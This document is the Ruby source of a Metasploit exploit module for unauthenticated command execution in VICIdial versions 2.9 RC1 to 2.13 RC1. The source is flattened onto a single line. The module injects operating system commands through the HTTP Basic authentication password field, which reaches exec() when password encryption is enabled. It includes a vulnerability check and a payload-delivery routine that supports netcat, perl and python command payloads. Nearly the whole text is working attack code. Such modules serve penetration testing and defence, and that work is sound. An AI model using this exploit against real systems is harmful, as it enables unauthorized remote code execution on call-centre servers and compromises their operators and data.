  7. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'VICIdial user_authorization Unauthenticated Command Execution', 'Description' => %q{ This module exploits a vulnerability in VICIdial versions 2.9 RC 1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default). When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to exec(). This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS. }, 'License' => MSF_LICENSE, 'Author' => 'Brendan Coles <bcoles[at]gmail.com>', 'References' => [ ['URL', 'http://www.vicidial.org/VICIDIALmantis/view.php?id=1016'] ], 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { # HTTP Basic authentication password 'Space' => 2048, # apostrophe ('), quote ("), semi-colon (;) and backslash (\) # are removed by preg_replace 'BadChars' => "\x00\x0A\x22\x27\x3B\x5C", 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python netcat' } }, 'Targets' => [[ 'Automatic Targeting', {} ]], 'Privileged' => false, 'DisclosureDate' => 'May 26 2017', 'DefaultTarget' => 0)) register_options([ OptString.new('TARGETURI', [true, 'The base path to VICIdial', '/vicidial/']) ]) deregister_options('USERNAME', 'PASSWORD') end def check user = rand_text_alpha(rand(10) + 5) pass = "#{rand_text_alpha(rand(10) + 5)}&#" res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'), 'authorization' => basic_auth(user, pass) unless res vprint_status 'Connection failed' return CheckCode::Unknown end if res.code != 401 vprint_status "#{peer} Unexpected reply. Expected authentication failure." return CheckCode::Safe end # Check for input filtering of '#' and '&' characters in password # Response for invalid credentials is in the form of: |<username>|<password>|BAD| if res.body !~ /\|#{user}\|#{pass}\|BAD\|/ vprint_status "#{peer} Target is patched." return CheckCode::Safe end # Check for ../agc/bp.pl password encryption script res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '..', 'agc', 'bp.pl') if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/ vprint_status "#{peer} Password encryption is supported, but may not be enabled." return CheckCode::Appears end vprint_status "#{peer} Could not verify whether password encryption is supported." CheckCode::Detected end def execute_command(cmd, opts = {}) user = rand_text_alpha(rand(10) + 5) pass = "#{rand_text_alpha(rand(10) + 5)}& #{cmd} #" print_status "#{peer} Sending payload (#{cmd.length} bytes)" res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'), 'authorization' => basic_auth(user, pass) if !res fail_with(Failure::Unreachable, 'Connection failed') elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/ print_good "#{peer} Payload sent successfully" else fail_with(Failure::UnexpectedReply, 'Unexpected reply') end end def exploit execute_command(payload.encoded) end end